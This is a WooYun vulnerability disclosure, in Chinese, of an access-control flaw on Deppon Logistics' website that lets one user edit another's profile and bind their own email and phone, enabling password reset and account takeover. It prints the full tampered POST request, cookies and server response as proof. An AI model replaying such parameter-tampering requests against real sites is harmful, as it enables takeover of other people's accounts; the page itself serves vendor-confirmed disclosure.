当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110225

漏洞标题:德邦物流越权修改任意用户信息+修改任意用户密码(连锁反应)

相关厂商:deppon.com

漏洞作者: Summer

提交时间:2015-04-25 00:48

修复时间:2015-06-13 09:56

公开时间:2015-06-13 09:56

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-25: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经确认,细节仅向厂商公开
2015-05-09: 细节向核心白帽子及相关领域专家公开
2015-05-19: 细节向普通白帽子公开
2015-05-29: 细节向实习白帽子公开
2015-06-13: 细节向公众公开

简要描述:

( ̄▽ ̄)

详细说明:

这个越权很奇葩,因为它越权不仅仅是修改任意用户的信息,而且还可以绑定任意用户邮箱,绑定任意用户手机号,并且能够长期控制帐号,邮箱和手机号都可以用于密码找回
攻击者:Summer123321
受害者:Summer321321
我们先看下攻击者的帐号,熟悉一下这个越权的流程:

1.png


攻击者只需要将手机和邮箱越权绑定就达到了修改用户密码的目的,并且没有发现解绑的页面,攻击者会长期控制受害者的帐号
下面来看看密码找回流程:

2.png


1.通过邮箱找回
2.通过手机验证码
这幅图已经是攻击者完成对受害者越权修改信息的图片,这里绑定了受害者的邮箱和手机,那么修改密码是很轻易可以完成的

漏洞证明:

手机号已经打码
请求:

POST /user/updateuser.action HTTP/1.1
Host: 180.153.24.4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://180.153.24.4/user/touserinfo.action
Content-Length: 454
Cookie: pageReferrInSession=; pgv_pvid=1300498580; Hm_lvt_39f474fa8fa9cefbed841228218c1418=1429885848,1429888013; CNZZDATA2456613=cnzz_eid%3D1615368528-1429885034-%26ntime%3D1429885034; __utma=14640183.1533181367.1429885848.1429885848.1429888014.2; __utmz=14640183.1429885848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=ZxON5liWX9aS5CkdsyEHfg__; BIGipServerpool_newweb_8080=1879288000.36895.0000; Hm_lpvt_39f474fa8fa9cefbed841228218c1418=1429889181; __utmb=14640183.42.10.1429888014; __utmc=14640183; lastLoginTime=2015%E5%B9%B404%E6%9C%8824%E6%97%A5++23%3A03%3A08; BIGipServerpool_newweb_80=3020073152.20480.0000; pageReferrInSession=http%3A//180.153.24.4/order/; depponLoginUserName=Summer321321; __utmt=1; __qc_wId=944
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
pageUser.realName=Hacker&pageUser.telephone=********&pageUser.fixedPhone=010-21312121&pageUser.procity=%E5%B9%BF%E4%B8%9C%E7%9C%81-%E6%B7%B1%E5%9C%B3%E5%B8%82-%E7%A6%8F%E7%94%B0%E5%8C%BA&pageUser.province=&pageUser.city=%E5%B9%BF%E4%B8%9C%E7%9C%81-%E6%B7%B1%E5%9C%B3%E5%B8%82-%E7%A6%8F%E7%94%B0%E5%8C%BA&pageUser.address=11111&pageUser.userName=Summer321321&pageUser.gender=%E5%85%88%E7%94%9F&pageUser.userType=0&pageUser.remarkAddress=&valCode=873914


返回:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: application/json;charset=UTF-8
Date: Fri, 24 Apr 2015 15:21:53 GMT
Content-Length: 2319
{"success":true,"isException":false,"cellPhone":null,"chooseWays":null,"codeMessage":null,"codeType":0,"consignors":null,"count":0,"currPage":1,"cusMsg":null,"custCode":null,"dataSize":0,"email":null,"exception":false,"flag":null,"ifElecBillBigCusts":0,"isComeIn":"no","isPrintUser":null,"isRefush":null,"list":null,"loginBefActionName":null,"loginJump":null,"logoutBefActionName":null,"message":"ok","modifyType":null,"nowTime":null,"pageCount":null,"pageSize":10,"pageUser":{"address":"11111","password":null,"userName":"Summer321321","roles":null,"status":0,"cusCode":null,"validateCode":null,"deptId":null,"city":"广东省-深圳市-福田区","area":null,"province":"","telephone":"*********","fixedPhone":"010-21312121","remarkAddress":"","siteMessage":0,"email":null,"newPwd":null,"userType":2,"realName":"Hacker","refundPaymentOrder":0,"transportingOrder":0,"unuseCoupon":0,"gender":"先生","lastLoginTime":null,"lastUpdateTime":null,"procity":"广东省-深圳市-福田区","regiterTime":null,"bindTime":null,"status1":0,"hdNature":0,"roleids":null,"custSourceId":null,"id":null,"createUser":null,"createDate":null,"modifyDate":null,"modifyUser":null},"pagingConsignor":null,"pagingStr":null,"phoneMessageG":"success","phoneNumber":null,"phoneTime":null,"qqList":[],"quhao":null,"remeberName":null,"status":null,"successResultValue":null,"tatolCount":0,"thirdBinding":null,"user":{"address":"11111","password":"************","userName":"Summer123321","roles":null,"status":2,"cusCode":null,"validateCode":null,"deptId":null,"city":"广东省-深圳市-福田区","area":null,"province":null,"telephone":null,"fixedPhone":"010-21312121","remarkAddress":null,"siteMessage":0,"email":"*********@126.com","newPwd":null,"userType":0,"realName":"11111111","refundPaymentOrder":0,"transportingOrder":0,"unuseCoupon":0,"gender":"先生","lastLoginTime":1429888056000,"lastUpdateTime":1429888722000,"procity":"广东省-深圳市-福田区","regiterTime":1429887621000,"bindTime":null,"status1":0,"hdNature":0,"roleids":null,"custSourceId":null,"id":"147A73E8EDE1CCC3E050A8C0480206A7","createUser":null,"createDate":null,"modifyDate":null,"modifyUser":null},"userId":null,"userName":null,"userType":0,"username":null,"valCode":"873914","validateCode":null,"wbList":[],"yourEmail":null}


3.png


修复方案:

版权声明:转载请注明来源 Summer@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-29 09:56

厂商回复:

感谢您对德邦安全的关注以及对漏洞的反馈

最新状态:

暂无